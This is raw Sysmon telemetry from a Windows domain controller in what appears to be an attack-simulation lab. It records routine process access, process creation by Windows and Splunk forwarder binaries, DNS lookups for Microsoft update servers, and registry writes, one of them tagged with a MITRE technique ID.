14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000018591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:18.027{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:19.058{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:19.058{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.142{59A5CD1D-8E46-6005-1600-00000000A301}1544sls.update.microsoft.com0type: 5 sls.update.microsoft.com.akadns.net;type: 5 sls.emea.update.microsoft.com.akadns.net;::ffff:40.125.122.176;C:\Windows\System32\svchost.exe 22542200x800000000000000018612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:19.456{59A5CD1D-8E56-6005-2E00-00000000A301}2464176.122.125.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 13241300x800000000000000018613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:34.682{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda2-0xb5eeeca4) 13241300x800000000000000018614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 
14:03:36.699{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 10341000x800000000000000018622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9540-6005-5605-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:44.526{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:44.526{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9540-6005-5605-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9540-6005-5605-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:44.526{59A5CD1D-9540-6005-5605-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.388{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9541-6005-5705-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000018629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.387{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.386{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:45.386{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.386{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.386{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9541-6005-5705-00000000A301}6860C:\Program 
